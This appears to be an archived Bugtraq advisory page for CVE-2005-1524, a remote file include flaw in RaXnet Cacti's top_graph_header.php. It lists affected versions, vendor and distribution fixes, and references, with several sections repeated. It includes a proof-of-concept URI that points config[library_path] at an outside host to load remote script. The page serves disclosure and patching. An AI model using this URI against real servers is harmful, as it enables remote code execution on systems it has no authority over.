RaXnet Cacti Top_Graph_Header.PHP Remote File Include Vulnerability
BID:14030
Info
RaXnet Cacti Top_Graph_Header.PHP Remote File Include Vulnerability
| Bugtraq ID: | 14030 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-1524 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 22 2005 12:00AM |
| Updated: | Jul 12 2009 04:06PM |
| Credit: | Discovery is credited to Maciej Piotr Falkiewicz along with an anonymous researcher. |
| Vulnerable: |
Raxnet Cacti 0.8.6 d Raxnet Cacti 0.8.6 c Raxnet Cacti 0.8.6 b Raxnet Cacti 0.8.6 a Raxnet Cacti 0.8.6 Raxnet Cacti 0.8.5 a Raxnet Cacti 0.8.5 Raxnet Cacti 0.8.4 Raxnet Cacti 0.8.3 a Raxnet Cacti 0.8.3 Raxnet Cacti 0.8.2 a Raxnet Cacti 0.8.2 Raxnet Cacti 0.8.1 Raxnet Cacti 0.8 Raxnet Cacti 0.6.8 a Raxnet Cacti 0.6.8 Raxnet Cacti 0.6.7 Raxnet Cacti 0.6.6 Raxnet Cacti 0.6.5 Raxnet Cacti 0.6.4 Raxnet Cacti 0.6.3 Raxnet Cacti 0.6.2 Raxnet Cacti 0.6.1 Raxnet Cacti 0.6 Raxnet Cacti 0.5 Gentoo Linux Debian Linux 3.1 sparc Debian Linux 3.1 s/390 Debian Linux 3.1 ppc Debian Linux 3.1 mipsel Debian Linux 3.1 mips Debian Linux 3.1 m68k Debian Linux 3.1 ia-64 Debian Linux 3.1 ia-32 Debian Linux 3.1 hppa Debian Linux 3.1 arm Debian Linux 3.1 alpha Debian Linux 3.1 Debian Linux 3.0 sparc Debian Linux 3.0 s/390 Debian Linux 3.0 ppc Debian Linux 3.0 mipsel Debian Linux 3.0 mips Debian Linux 3.0 m68k Debian Linux 3.0 ia-64 Debian Linux 3.0 ia-32 Debian Linux 3.0 hppa Debian Linux 3.0 arm Debian Linux 3.0 alpha Debian Linux 3.0 |
| Not Vulnerable: |
Raxnet Cacti 0.8.6 e |
Discussion
RaXnet Cacti Top_Graph_Header.PHP Remote File Include Vulnerability
RaXnet Cacti is prone to a remote file include vulnerability.
The problem presents itself specifically when an attacker passes the location of a remote attacker-specified script through the 'top_graph_header.php' script.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
RaXnet Cacti is prone to a remote file include vulnerability.
The problem presents itself specifically when an attacker passes the location of a remote attacker-specified script through the 'top_graph_header.php' script.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
Exploit / POC
RaXnet Cacti Top_Graph_Header.PHP Remote File Include Vulnerability
An exploit is not required.
A proof of concept URI was provided:
http://www.example.com/path_of_cacti/include/top_graph_header.php?config[library_path]=http://www.exmpale2.com/
An exploit is not required.
A proof of concept URI was provided:
http://www.example.com/path_of_cacti/include/top_graph_header.php?config[library_path]=http://www.exmpale2.com/
Solution / Fix
RaXnet Cacti Top_Graph_Header.PHP Remote File Include Vulnerability
Solution:
The vendor has released version 0.8.6e to address this, and other issues.
Gentoo Linux has released advisory GLSA 200506-20 to address this, and other issues. Users of affected packages are urged to execute the following commands with superuser privileges:
emerge --sync
emerge --ask --oneshot --verbose ">=net-analyzer/cacti-0.8.6e"
Please see the referenced advisory for further information.
Conectiva Linux advisory CLSA-2005:978 is available to address various issues affecting cacti. Please see the referenced advisory for more information.
Gentoo Linux has updated advisory GLSA 200506-20 to GLSA 200506-20:02 to address this, and other issues. Users of affected packages are urged to execute the following commands with superuser privileges:
emerge --sync
emerge --ask --oneshot --verbose ">=net-analyzer/cacti-0.8.6f"
Please see the referenced advisory for further information.
Debian GNU/Linux has released advisory DSA 764-1 to address various issues in Cacti. Please see the referenced advisory for further information.
Raxnet Cacti 0.5
Raxnet Cacti 0.6
Raxnet Cacti 0.6.1
Raxnet Cacti 0.6.2
Raxnet Cacti 0.6.3
Raxnet Cacti 0.6.4
Raxnet Cacti 0.6.5
Raxnet Cacti 0.6.6
Raxnet Cacti 0.6.7
Raxnet Cacti 0.6.8 a
Raxnet Cacti 0.6.8
Raxnet Cacti 0.8
Raxnet Cacti 0.8.1
Raxnet Cacti 0.8.2 a
Raxnet Cacti 0.8.2
Raxnet Cacti 0.8.3 a
Raxnet Cacti 0.8.3
Raxnet Cacti 0.8.4
Raxnet Cacti 0.8.5
Raxnet Cacti 0.8.5 a
Raxnet Cacti 0.8.6 a
Raxnet Cacti 0.8.6
Raxnet Cacti 0.8.6 b
Raxnet Cacti 0.8.6 d
Raxnet Cacti 0.8.6 c
Solution:
The vendor has released version 0.8.6e to address this, and other issues.
Gentoo Linux has released advisory GLSA 200506-20 to address this, and other issues. Users of affected packages are urged to execute the following commands with superuser privileges:
emerge --sync
emerge --ask --oneshot --verbose ">=net-analyzer/cacti-0.8.6e"
Please see the referenced advisory for further information.
Conectiva Linux advisory CLSA-2005:978 is available to address various issues affecting cacti. Please see the referenced advisory for more information.
Gentoo Linux has updated advisory GLSA 200506-20 to GLSA 200506-20:02 to address this, and other issues. Users of affected packages are urged to execute the following commands with superuser privileges:
emerge --sync
emerge --ask --oneshot --verbose ">=net-analyzer/cacti-0.8.6f"
Please see the referenced advisory for further information.
Debian GNU/Linux has released advisory DSA 764-1 to address various issues in Cacti. Please see the referenced advisory for further information.
Raxnet Cacti 0.5
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.6
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.6.1
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.6.2
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.6.3
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.6.4
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.6.5
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.6.6
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.6.7
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.6.8 a
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.6.8
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8.1
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8.2 a
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8.2
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8.3 a
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8.3
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8.4
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8.5
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8.5 a
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8.6 a
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8.6
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8.6 b
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8.6 d
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
Raxnet Cacti 0.8.6 c
-
Raxnet Cacti 0.8.6e
http://www.cacti.net/download_cacti.php
References
RaXnet Cacti Top_Graph_Header.PHP Remote File Include Vulnerability
References:
References:
- Cacti Homepage (Cacti)
- CLSA-2005:978 - cacti (Conectiva)
- Release Notes - 0.8.6e (Raxnet)
- iDEFENSE Security Advisory 06.22.05: Multiple Vendor Cacti config_settings.php R ("iDEFENSE Labs"
) - iDEFENSE Security Advisory 06.22.05: Multiple Vendor Cacti Remote File Inclusion ("iDEFENSE Labs"
)